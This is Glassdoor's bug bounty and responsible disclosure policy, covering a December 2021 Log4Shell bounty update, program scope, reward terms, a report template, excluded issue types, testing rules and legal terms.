Glassdoor believes that working with skilled security researchers across the globe is crucial in providing a trusted and secure service to help people everywhere find jobs and companies they love.

If you believe you've identified a potential security issue in our product or service, we encourage you to notify us. We will investigate and do our best to promptly address the issue and keep you updated as we work to fix the bug you submitted.

12.13.2021 Log4Shell update:

Glassdoor has patched most of the log4j vulnerable(CVE-2021-44228) applications Friday and over the weekend. If you happen to find any endpoints that are vulnerable to log4shell(CVE-2021-44228) please report it to us we will pay double our critical bounty up to $5000.

Detections in the form of pingbacks that include host information such as hostname or IP are acceptable and preferable. Please share your IP when you get the pingback for us to triage your reports faster.

12.14.2021 Log4Shell scope update:

help.glassdoor.com would be out of scope as this system is hosted by a third-party vendor.

Disclosure Policy:

• Let us know as soon as possible upon discovery of a potential security issue, and we'll make every effort to quickly resolve the issue.

• Provide us a reasonable amount of time to resolve the issue before any disclosure to the public or a third-party.

• Make a good faith effort to avoid privacy violations, destruction of data, and interruption or degradation of our service. Only interact with accounts you own or with explicit permission of the account holder.

• If you want to test some payloads use our test companies such as Umbrella Corporation and/or Winkler Web Designs - please don't test against other companies which you don't have explicit permission to.

Scope

Vulnerabilities must be within the http://www.glassdoor.com/ site, Application Programming Interface (API) or one of the official glassdoor mobile applications. Systems that we do not control (such as third-party sites) are excluded from the scope of the program.

• https://www.glassdoor.com/

• Glassdoor API

• iOS and Android mobile apps

• https://help.glassdoor.com/

Rewards

To show our appreciation of responsible security researchers, Glassdoor offers a monetary bounty for reports of qualifying security vulnerabilities. Reward amounts will vary based upon the severity of the reported vulnerability, and eligibility is at our sole discretion. Awards will be provided only to the first researcher to responsibly disclose the bug.

Submitting Vulnerability Reports:

In order to make triage of vulnerabilities as streamlined as possible, please provide as much detail as possible. We have created a simple template which will aid in the submission process:

Affected URL:

Affected Parameter:

Vulnerability Type: (see list below)

Steps to Reproduce/POC:

Screenshots/Video:

Browsers tested:

Potential Impact:

Details of exploitation scenarios:

Vulnerability Types:

• Remote Code Execution

• Memory Corruption

• SQL Injection

• Privilege Escalation

• Command Injection

• Authentication

• Information Disclosure

• XSS

• Design Issue

• Crypto Issue

• CSRF

• Unvalidated / Open Redirect

• Clickjacking

• Other (please detail)

Exclusions:

The following issues are outside the scope of our rewards program:

• Denial of service

• Any physical attempts against Glassdoor property or data centers

• Password, email and account policies, such as email id verification, reset link expiration, password complexity

• Lack of CSRF tokens (unless there is evidence of actual, sensitive user action not protected by a token)

• Login/logout CSRF

• Cross-user/shared-CSRF token vulnerabilities that require shared cookies to be used as well (eg. gdid)

• Attacks requiring physical access to a user's device

• Missing security headers which do not lead directly to a vulnerability

• Missing best practices

• Self-XSS

• XSS on any site other than Glassdoor.com and help.glassdoor.com

• Host header injections unless you can show how they can lead to stealing user data.

• Use of a known-vulnerable library (without evidence of exploitability)

• Issues related to software or protocols not under Glassdoor control

• Reports from automated tools or scans

• Reports of spam (i.e., any report involving ability to send emails without rate limits)

• Bypass of malware detection

• Attacks that require attacker app to have the permission to overlay on top of our app (e.g., tapjacking)

• Vulnerabilities affecting users of outdated browsers or platforms

• Social engineering of Glassdoor employees or contractors

• Presence of autocomplete attribute on web forms

• Missing cookie flags on non-sensitive cookies

• Reports of insecure SSL/TLS ciphers (unless you have a working proof of concept, and not just a report from a scanner)

• Any report that discusses how you can learn whether a given username, email address has a Glassdoor account.

• Any access to data where the targeted user needs to be operating a rooted mobile device.

• Any report about DLL hijacking without demonstrating how it gains new privileges is out of scope.

• Cache Poisoning using X-Forwarded-Host on personal profile endpoints or without showing sufficient impact

• Tab Nabbing or other rel="noopener" bugs

A sensitive operation is (not limited to) -

1. Ability to access multiple users PII information without interaction

2. Ability to take over an account without users knowledge and/or interaction.

3. Ability to manipulate our backend cloud services such that it puts our users data at risk.

4. The above severities are not set in stone - severities are subject to change and submissions will be reviewed on a case-by-case basis to generally cover for issues that may be highered or lowered due to things like impact, etc

5. PII consists of data that readily identifies an individual on the face of the data (e.g., a name, email address, phone number, national ID number, etc.) If the data exposed includes this type of data, all the data exposed with it is also considered PII. However, if facially identifiable data is not present in the exposure (i.e. it is not possible for a third-party to identify who the data belongs to) then the exposed data does not constitute PII as exposed (even if it would constitute PII within Glassdoor’s systems because it is normally connected to facially identifiable data).

Rules:

• Submit one vulnerability per report unless you need to chain those vulnerabilities to show higher impact.

• Multiple vulnerabilities caused by one underlying issue will be awarded one bounty.

• Please provide detailed reports with reproducible steps.

• Don't DDoS or otherwise attack us in a way that would disrupt service for our customers - Don’t leave any system in a more vulnerable state than you found it.

• This means that you should not engage in testing or related activities that degrades, damages, or destroys information within our systems, or that may impact our users, such as denial of service, social engineering or spam

Legal Terms:

By participating in Glassdoor’s Bug Bounty program (the “Program”), you acknowledge that you have read and agree to Glassdoor’s Terms of Use as well as the following:

• Your participation in the Program will not violate any law applicable to you, or disrupt or compromise any data that is not your own.

• You are solely responsible for any applicable taxes and/or withholdings, arising from or relating to your participation in the Program, including from any bounty payments.

• Glassdoor reserves the right to terminate or discontinue the Program at its discretion.

Thank you for helping keep Glassdoor and our users safe!